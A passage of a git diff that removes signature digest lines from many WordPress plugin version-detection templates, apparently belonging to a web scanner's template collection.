490a00463044022000f18dda719bb857e01fc1efaaa6acbf81cbb5eb8442721bf4e4bd5654a2531e022001e5d1ca05db685bdec3d31906b4f3cef59248c5dd2a1fe777aa161311339e9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 93e0f7df22..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220139d42f1e0488ac0e9b2c9e323797f482a04f273d3b3b2365dfc2c10809cd0bc0221008293dfddbaa2b9498e7f09e71fb819e0637b12894627f12fc074177fabeca16b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 2edff28251..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220365930383966ec4c052420f1c4b6b2e531f811031a575670cadf1396e3731cd002206bb20f63d74696ca83e7cd18ea0616ccc82dd1171263c407cd8458186f648508:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index d67b9beaec..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b69bd27bda888f4a663b8142b07747fb9c4586e05d4cd09bfb5c8aab3bd1469a022039f73fbecea517b0dabb9944f0f51d29011f87d01d121345427740ff220f5477:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index c0958416ff..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022075bb08a827a4a3225f849f711c41d49036a2893eca7e6001788495e1abb42514022100e0a1c58322075a2d89e8bf2c26b27eddbf4af275cc4096997a2da34ffede8168:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index e174650f2d..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204ee8825d5f290395c9d49a8a563081df3dd1117b74c7b1a3bd01bbfc7fcbd6bb02205e82a1b808842ba0637c605980b010a14bde98047593e25789e49760d0993598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index fff72f052e..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200d6ffe6b42a5376b64cdd1f35769a88bdcddeec0a3b623a67178ca2d1aeccc6802201bc2387471baa0abb7c09db01dfc9766e5190e8b726eb9128dc6dd0f328e191d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index cd8160b065..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210081db43b7f99ad42c1e7a49f85304a85aab86bf57b1a32516d85a9d7ea939c4d102204df02e815d5919166ca748b3db13dc75eeabcf042a1ffdcbc7f7bd9c32891cc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index cc98ff1c0e..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010f258cd24f4cb7aa543f5668ae85b1938e8acf2779a0552de946bd7f4fc81360221009e357800080ef343d66d35657c89652bff30c792b229b85009d42a027d02c61b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 9f6310ea57..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204fee5144359e20e951c8b13b674c1a5cdaa71dfcd7cd08df30fc4ae510ca0374022100cde95a6191aca0b414ebe2cf6cb8c705f9b9abb1f4cf5624c3338bbc01c13355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index c700ee1778..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210097335284eb3012e5f6206e69888a6a8b5db82e06acb656bf8a18e810acf108d502206f22b1ac46d057116d15c75bcbea6bf0c9e706d944b7e6a7a8125c23c304ae64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 8deafe5213..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b83c10f29087616d9a4f8aa3cb667d88c2b469e816a43eb5c60f845eebe7ad4022014ad663aaf89acccb53185fcc732846165d857ec61a2997d8ee3add27d8a53bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 252022c6cc..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203dbecdd76d7c094f2d7a2a1619bfb717778a55c79d0e7ff1310b2ce15ad55b1f022045903b8a6f20de7c9abd0fe1e9cc20c5ee0132303296dd71db2b3f3c583f524f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 8bd86eb2af..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ddd68b68e58e0bbbdc6e24489fb9fa705434a680f036e73e939dee004068d8110221008904a6b10ca3bbc2356ca2d2fb5b124ef655a12d1592ff1699e3aa4bcad2ebd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 51fce282f3..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202bf422f19932a484417816f1f8540ddec428fc81396b6236262b619368b73de1022100c64dbc9926a6c7b89c0f9a451da0bbc867243d83605e04f6f3c35232d1612f09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 96ea6f587e..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f96f027f17ebbaafef816a808df98a39ce50010afbf25fa623985230150873d02210098bc8243d54d9921a8c9755968ffb92fc8fc38f103555bab26d50bf9540387de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index bb037f69ee..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cbbfe4df2568873757b669ee86b436dd73b5fccdc63fdf7d99ad8d684f597a36022100ad415d006d2094617b245c6fce977875326a112881a96fa4571172a8633047f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 3a6d90a8c8..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bd71374326bf72aac32b7983c4af7e9831cb21bbbf2204fe7b3318456f47b4ef022100ced469f62d63c321d1144c4a64d2f6e993b836a465384d45116751e1a39182c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 47646c37d4..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e84f14015696138e680af01af58983b59ce58313eee8497ffa33a2fe9540ae4202206c337dd2edc13af16423242e22e3ca7754c2034f5ea77f3d555d25b6ae67ef66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 1d6f7b1810..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220528db20db3b7d5bc64754e18a687c3a2ca029643693b3efa78069773c3b99d5f022100f4775c71bd6539a25a24dd75f920569c3f8c6a59ef86f160d685390d2c0829c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index f37d683e43..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206aea12238f63be5fb9b25b577f21ae7c85f5cbe9afe21e901202ba6f07b63826022052c135924a6adbcd7073ceec2a85688a1a8ac21f9a5f769ebe9c8d3c322d2724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index bd56095403..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205f524d3e97cabc9f493f9c6e85929f0e5e104d666e2a93b3f1047d70d55ba58f02202c998e4c10977b826cc64f860b0d4756b41b0f3cbd81df2289c7123fafa037e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 37c053ec1a..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022073490cc399f8dc4e7f05a92cec811daddacb5c430e07448ef0dcaca8175117df022045e13708000826724c90bcf11f5e6e701716fde43ef2b8a14316375cd3223121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dca42757ac..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a41682c2d8b17da98ae0ae6e3f27898c4c668f3979d6fe47436622d7a1f8323902204eafb246bce6aa68dbd3aff7d5fee3770cae9daa8a179b1c4a23628d1917442b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 235a7dbff8..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207b48d0c2ea277b890f5dd49e707572be076eccc4054725e794f5706abeca2ca502207e9989e86f67d27dbaa8946909fd69d0f41d1bb6264da5de2f9a113cf744b39b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 43ed59d408..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206c94289fe43114d7d3c099346aa8c8a8edf2791cbf9f47b9b9a08ab11b9fd1c30221008db36943e35c21bc7d9f8761799520716643ea860c1ccbe3f87b1db2d78678b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5d5f1326dd..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ac6f6a459012aa62907ec4529bc6d2d65576092906ed878124122f15302a49902206c9229ca73f67eb69284d0794608355fe9de3f737b9d2bbbbfd73a5f14c11355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 5b72918e85..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a41cac3802ea8b8242ed684465ac63f130f795c27aa0ff40adea848214ac3102022100ee2c10322539a2bcd1380e88b81e8eef1340b2cf85e3ed3d7b0a8de2ed5240f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 1e49d5e101..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202a082954a8ebfde841623554e9e499f2f7388f267f632c0bd92a402743958977022100c225fb25941ef5811fb483887e80e1add21f4cf1d4327eddf8d368423b686edf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index fb6ca905b4..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100abf344c7405b5bf33e68d9ba009f0740a8856d5319137995a55fbd9906210a7a0220511c66b89e042a88c1412d89dc30f7c2268dd66b5f00b6a610f1a694a2afdc20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index c59c7aa56b..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207b55f0896ce4369849609d509f4bf62d9735e2a4d18752ea400a9463edda135a022100903ad4f2a453c8fea138a0328fc043f8396a0944790768ef82562a04a3d2951f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index c9398cfa0b..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b8c2dffd8971a0db49238542ba008e0dda3518901670d9e3e3a7e36ac7a49c8d022100d5aa65385d7cffeff420e9a2c112f1b64f40977bb4fbf90ed999e9e79f42bf82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index c0a31e9187..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100938111d19b72e46fc00509046baf6b2d36cf0a2ad961916db24db877001cdafe02206082ec7480e8dedae7cb30324eacb32eaca5f6804cfc908f7803394580f15f59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index ea0acd46f0..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200a209536d1c9be1e284af5acb6d3e611146fd3c01c116b6da9506234783ea6ac02204ac2a141dbc139c3c99eabfe5eaa3e7c99ff20166d4344f2040ec4cd9b872e7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 937fede554..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022040ee9df92b041d50fd4f293eafe85bf3b3185d0fb29794bc35b88edff1d2f2d7022100addf13d4f904351be71d74c87d8f6edec85cbe2f76de8d1035f500a0bc2376f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 1bb587dd53..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008894e5f82c5003e31774260c43d227c579220e1f9f33496cfa0462061103cba4022043af003ca6352de28200611a95e2230c6fb8f48a1f8d3ce1f1f230b62ece275f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 9480758bb4..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220620cbaf64a6dfbbaa100a7be738062c8fe1dbb3e3244937a89984850384c648a02210088f9f877a6c905686c6ed7a7ca8cd8beef6960f93acae6149dc00bc4dd61bbd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index bdc9fc95ad..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022057dddc6afbafe94a8088c5db503b672754004ce61c0fe999b0128911c96ae4b102201cae6f2813935a1407d38694afd6a736b433bf856f97f7f10b72c63028848529:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index f7dd7def57..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210091db942690714751a7f99ffabbf449ff11bc10980e0865a4bd48a72549b3e4bd022100fa04b0f0defd796a7bcef828738c59824b3993979c227c881ec92f37c37b770c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 688825e47b..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210089ca6106e6f90b75fac70cb5b5c4d6ad66623d86f1464be925f3bb92a034e7e502200fddd71eeb07db2b74ee24be5165f2497d0660895e03ddc98e25319fe7449933:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b4a0eb09ff..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220546562107e40606a068e5509668ac6777159661e7afb6f78285aba4e5873ea9302204e194ccb538c6ef3fdeed5e5020c47a4daf795e68171cb3edae124859bdf92fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 54ae9fa759..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b2ff0d18062c142ff17907c66848443d58786b6b3be720dbed2a4d72fa676410022100b04d81e1be5101d72baab254855f305b92ed68e4d3e3761e35534a8a7a3e8ba5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 0b15170082..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205c72c973e85bf9397cc00f78e60603094e5944ae42e548a8ac288ed4f93eb1e20220621fe3b1ac0b09cb26cc778c1ab7503db5528d1a7c0713f7b02f60692705e7ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 981d185157..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e25186ab5f4c48b3f49486b40fe75d7459901cd8fd00d6356473d301f65288e50220365a2489f98ad175a87b96db08dcffc9a0c5847f41eeacae9312e741f8440c98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 2fb82499a7..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b49e6565c02278bb31edb6090548d31ce747f4ba472500fc05ef09e89d454947022100ef2ede4bc89c9cd0a1e254ac92618d6ae42efb33c5a6d02b7db7195b8d14830b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 69fd424cfc..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022049588d31c8db480058fe3558fc40b52bc3210222c9163c635fb39ec1843f6d310221008c9b0cc77fa22daac3c75ac75f1a4aa66fdabeb178758072627fe336a9b0e58b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index f7ef8aac26..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009055f800aca5bfe2aab503ffee886684cf3f5be895c2c5087efcdd99ae2a7cc8022100d118a8c36d909b6d3025805af315b46eea0f74709add4259bee29ed8a1edd65c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index b24d2250b0..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 